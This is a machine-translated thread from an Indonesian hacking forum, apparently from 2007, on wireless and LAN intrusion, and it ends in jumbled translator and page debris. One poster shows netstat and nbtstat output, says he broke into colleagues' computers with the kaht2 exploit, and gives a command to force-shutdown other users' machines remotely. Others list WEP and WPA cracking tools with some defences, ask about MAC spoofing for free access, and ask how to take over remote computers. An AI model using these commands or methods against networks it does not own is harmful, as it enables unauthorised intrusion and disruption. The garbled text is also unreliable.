TCP me: 1288 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1306 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1314 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 5101 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap 10.22.1.236:4504 TIME_WAIT
TCP me: netbios-ssn me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 LAJKTTS02: 1080 ESTABLISHED
TCP me: 1288 IS ~ HRS: microsoft-ds ESTABLISHED
TCP me: 1306 GREENGUY: microsoft-ds ESTABLISHED
UDP to: 1134 *.*

the pc name is the port used for connection.


netstat on my office computer using ip using dhcp.
Here we can see anyone who wrote a computer connected in our
or with a more obvious example of this. For more details, I will try
infiltrate other people's computers by using kaht2: d
and I'm able to infiltrate.

C: \ WINDOWS \ system32> netstat-a


Active Connections

Proto Local Address Foreign Address State


TCP khs_2003: epmap khs_2003: 0 LISTENING
Khs_2003 TCP: microsoft-ds khs_2003: 0 LISTENING
TCP khs_2003: 1025 khs_2003: 0 LISTENING
TCP khs_2003: 1063 khs_2003: 0 LISTENING
TCP khs_2003: 1093 khs_2003: 0 LISTENING
TCP khs_2003: 1136 khs_2003: 0 LISTENING
TCP khs_2003: 1138 khs_2003: 0 LISTENING
TCP khs_2003: 5000 khs_2003: 0 LISTENING
TCP khs_2003: 43,715 khs_2003: 0 LISTENING
TCP khs_2003: epmap 10.21.3.17:3628 TIME_WAIT <------ 1
TCP khs_2003: epmap 10.21.3.50:1686 FIN_WAIT_2 <------ 2
Khs_2003 TCP: netbios-ssn khs_2003: 0 LISTENING
TCP khs_2003: 1093 10.21.1.18:8080 CLOSE_WAIT
Khs_2003 TCP: ESTABLISHED 1136 10.21.1.18:8080
Khs_2003 TCP: ESTABLISHED 1138 10.21.1.18:8080
TCP khs_2003: 11,196 khs_2003: 0 LISTENING
TCP khs_2003: 43715 10.21.3.50:1687 ESTABLISHED <------ 3
UDP khs_2003: microsoft-ds *: *
UDP khs_2003: isakmp *: *
Khs_2003 UDP: 1028 *: *
Khs_2003 UDP: 1035 *: *
Khs_2003 UDP: ntp *: *
Khs_2003 UDP: netbios-ns *: *
Khs_2003 UDP: netbios-dgm *: *
Khs_2003 UDP: 1900 *: *
UDP khs_2003: 13715 *: *
UDP khs_2003: 61804 *: *
Khs_2003 UDP: ntp *: *
Khs_2003 UDP: 1032 *: *
Khs_2003 UDP: 1036 *: *
Khs_2003 UDP: 1107 *: *
Khs_2003 UDP: 1134 *: *
Khs_2003 UDP: 1900 *: *
This computer is in susupi by I look nya.pada port number 3 is
kaht2 open ports to a computer sploit know.
and how we how we are to know the name of the computer being
infiltrate into our computer. Use nbtstat-a
C: \ WINDOWS \ system32> nbtstat-a [ip]
C: \ WINDOWS \ Syetem32> nbtstat-a 10.21.3.50
Heart:
Node Ipaddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
Workgroup <00> GROUP Registered
Workgroup <1E> GROUP Registered
ME <03> UNIQUE Registered
Inet ~ Services <1C> GROUP Registered
IS ~ ME ..........< 00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Take a look at it ip 10.21.3.50 pc name is me, and he join the workgroup.


We can make a peep surprised we were to use that facility netsend
only in a win 2000/XP or nt.

C: \ WINNT> net send [ip / pc name] [message]


Actually there's more fasilitas2 dos that can be used for fun

or reply to idle moment nigh pake try this formula

Quote
taw for the host name of the destination computer .. pake scans can also be angry.
deh after that type in the command prompt eg:
c: / shutdown-s-f-m \ \ abcd-t 20
tu gone in 20 seconds, the client computer will shutdown .. violence ... : '(

«Last Edit: April 13, 2007, 12:55:48 PM by arbangun» Logged

-------------------------------------------------- ------------------------------
E2140 @ 3.2 Ghz | Mobo Biostar 945G Micro 775SE Ext | A-Data 2x1GB 800 PC6400 | LiteOn
DVD-RW | HIS X700Pro IceQ 256/128MB PCIe | LG LCD monitors 21 "
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

Arwan
Trade Count: (0)
Interest ..

Posting Quality: -1
Offline

Last Login: June 11, 2007, 11:16:42 PM


Posts: 11
HY $ 4.00 credits

View Inventory
Send Money to Arwan

never ending learning

Re: Hacking Wireless LAN!


«Reply # 13 on: April 14, 2007, 04:22:42 AM»

-------------------------------------------------- ------------------------------
lho kalo mas remote computer system of his victim's ga ga diaktifin can shutdown the victim with
the command C: \ shutdown .... cmiiw

yup, ethereal function read (read: capture) a message or data that flows on the network, so the
current data flow can be seen, what is opened, what data is sent if the email, myspace or something,
but can not seem to pass data https or secure socket layer, fix if I'm wrong

«Last Edit: April 14, 2007, 04:54:26 PM by Arwan» Logged

arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]

Quality posts: 2
Offline

Last Login: October 19, 2009, 02:03:55 PM


Posts: 130
HY $ 40.00 credits

View Inventory
Send Money to arbangun

ARB'S Coorp

Re: Hacking Wireless LAN!


«Reply # 14 on: April 16, 2007, 04:13:39 PM»

-------------------------------------------------- ------------------------------
More from yesterday ..... ADDITIONAL PAKE PInter BIAR BHS. ENGGRIS YES ...

Wireless Hacking Tools

Anyone interested in Gaining a deeper knowledge of wireless security and Exploiting


vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an
Abundance of free tools available on the Internet. This list is not meant to be comprehensive in
nature but rather to provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:

Network stumbler aka NetStumbler - This Windows based tool easily finds wireless signals being
broadcast within range - A must have. It also has ability to determine Signal / Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
Kismet [url] http://www.kismetwireless.net/Kismet
[/ url] - One of the key functional elements missing from NetStumbler is the ability to display
Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you
should Realize that Access Points are routinely broadcasting this info; it just is not being read /
deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical
in finding wireless networks.

You are not allowed to view images.


Please register or login

Attaching to the Found Wireless Network

Once you've found a wireless network, the next step is to try to connect to it. If the network is not
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID is not being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and / or encryption, you may need one of the following tools.

Airsnort - This is a very easy to use tool that can be used to Sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you'll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
CowPattyCowPatty
- This tool is used as a brute force tool for cracking WPA-PSK, considered the "New WEP" for
home Wireless Security. This program simply tries a bunch of different options from a dictionary
file to see if one ends up matching what is defined as the Pre-Shared Key.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
ASLeapASLeap
- If a network is using LEAP, this tool can be used to gather the authentication data that is being
passed across the network, and these sniffed credentials can be cracked. LEAP does not protect the
authentication like other "real" EAP types, which is the main reason why LEAP can be broken.

You are not allowed to view images.


Please register or login

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.

Ethereal - While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to Sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to Sniff-out non-broadcast SSIDs.

You are not allowed to view images.


Please register or login

You are not allowed to view images.


Please register or login

The aforementioned utilities, or similar ones, will be Necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it's important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.

NetStumbler - Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.

Kismet - There's really nothing you can do to stop Kismet from finding your WLAN, so Ensure
your WLAN is protected by using advanced Authentication and Encryption

Airsnort - Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).

Cowpatty - Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of Residing in a dictionary file that would used to be try and guess your key and / or would
take longer. If in a corporate scenario, do not use WPA with Pre-Shared Key, use a good EAP type
to protect the authentication and limit the amount of incorrect guesses that would take place before
the account is locked-out. If using certificate-like functionality, it could also validate the remote
system trying to gain access to the WLAN and not allow a rogue system access.

ASLeap - Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.

Ethereal - Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Logged

Jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 15 on: April 16, 2007, 10:42:34 PM»

-------------------------------------------------- ------------------------------
Ato okay how fuzzing
This reply is more relaxed, more 'polite' ..
Yg cmn clearly not useful for WLAN doang ..

full info: You are not allowed to view links.


Register or Login

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 16 on: April 18, 2007, 04:04:48 PM»

-------------------------------------------------- ------------------------------
kalo the MAC address, instead of a software tuh make change MAC address?
anyone ever tried blom? a good tu be replaced kalo, can be many hours free access .... hehee
Quote from: silverx on March 17, 2007, 11:41:56 PM
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
networks, although different worgroupnya ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1

kalo ndak wrong, I had also been mbaca similar articles. yes the cord tied to a WLAN antenna. gak
tau deh, kalo gak pake WLAN antenna can be anything ndak.jadi not pake usb, serial.kalo ndak a
diameter of the can also be adjusted to?

Logged

Panji
[Here To Help]
[Super Admin]
Trade Count: (2)
[Hyper]

Posting Quality: 72
Offline

Last Login: Today at 01:44:28 AM


Posts: 2515
HY $ 9654.00 credits

View Inventory
Send Money to Panji

Everything (better / worse) start from '1 '

Re: Hacking Wireless LAN!


«Reply # 17 on: April 18, 2007, 05:40:04 PM»

-------------------------------------------------- ------------------------------
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!

Logged

-------------------------------------------------- ------------------------------
just trying to serve You ...
You are not allowed to view images.
Please register or login
work as hard as u can .. and .. be as simple as u can, to be part of Others!

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 18 on: April 19, 2007, 03:19:49 PM»

-------------------------------------------------- ------------------------------
Crack WEP can be read at the 2nd edition HyperMedia Magazine.

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 19 on: April 20, 2007, 11:48:18 AM»

-------------------------------------------------- ------------------------------
bro all, mo nanya nih, kalo through Cain and abel dah dapet ip address, port, ama SSID, trus gimana
biar bisa nge-purpose remote computer?

Logged

aghya
[Community Member]
Trade Count: (0)
[Enthusiast]

Posting Quality: 0
Offline

Last Login: June 14, 2008, 09:49:04 PM


Posts: 109
HY $ 99.00 credits

View Inventory
Send Money to aghya

Re: Hacking Wireless LAN!


«Reply # 20 on: June 23, 2007, 07:53:36 PM»

-------------------------------------------------- ------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!

Oh well .. it .. I'm waiting ... 7th edition of the publication date when?

Logged

-------------------------------------------------- ------------------------------
Venice 3000 + @ 2600 (daily) .. so far
DFI LP UT Nf4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa GeForce 6600 GT
Samsung SATA 80
EXtreme 500

inou
Nubi all the time ... : D
[Community Member]
Trade Count: (2)
[EXTREME]

Posting Quality: 1
Offline

Last Login: July 06, 2009, 03:57:59 PM


Posts: 563
HY $ 82.00 credits

View Inventory
Send Money to inou

.: Lets Fill The World With Smile:.


Re: Hacking Wireless LAN!

-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------
!!
-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------
Sumbangkan terjemahan yang lebih baik

Terima kasih telah menyumbangkan saran terjemahan Anda ke Google Terjemahan.


Menyumbangkan terjemahan yang lebih baik:
Home Forum Help
Arcade Calendar Shop
LIVE CHAT button
Kirim Batal
GoogleTagged Login
Register <br>
<br>Input To
officials Forum
HYPERMEDIA <br>You
Bahasa
are notyang tersediato
allowed untuk penerjemahan:
view links.
Afrikaans
<br>Register orEsti Jepang Makedonia Rumania
Login <br>click here
Albania
and post <br> <br> Farsi Jerman Malta Rusia Thai
Arab
<br> <br>The Galisia Katalana Mandarin Serb Turki
Bahasa Indonesia
Unordinary Hindi Korea
<br>Enter Melayu Sloven Ukraina
your search terms
Belanda
<br>Web hyem.org Ibrani Kreol Haiti Norsk Slowakia Vietnam
Bulgar
<br>Submit search Inggris Kroat Pilipino Spanyol Wales
form <br> <br>You
Byelorusia
are not allowedIrlandia
to Latvi Polski Suomi Yiddi
Cek
view images. Islan Lituavi Portugis Swahili Yunani
Dansk
<br>Please registerItalia Magyar Prancis Swensk
or login <br> <br>
<br> <br>Welcome,
Guest. Please login
or register.
Object 1

<br>March©2010 Google - Matikan terjemahan seketika - Kebijakan Privasi -


06, 2010, Bantuan
05:55:13 PM <br>1
Hour 1 Day 1 Week 1
Month Forever
<br>Login with
Object 2

username, password
and session length
<br>Pricelist
Update!!
Object 3

<br>PriceList UPDATE Sedang diterjemahkan…


=&gt; You are not
allowed to view
links. <br>Register
or Login (last
updated 2009 Oct 21)
<br> <br> <br>Dragon
Xitro Hyper-3D
Design AP1 <br>II
Phenom X4 Deneb From
X2, DFI LP DK
790FXB-M2RS, Palit
HD 4850, OCZ Gold
Edition 2 x 1GB, 500
GB WDC 16 MB,
Enhance 400W ATX +
True <br>PROMO: Rp.
4,978,765, -- <br>
<br>Xitro Hyper-Fire
Dragon AP1 <br>Kuma
Athlon X2 7750 +,
abit AX78 AMD 770 /
SB600 CrossFire
Platform OTES
Dragon, Saphire
HD4830/HD4770, 2x2G
OCZ Gold Ed 8500
Object 4

Оценить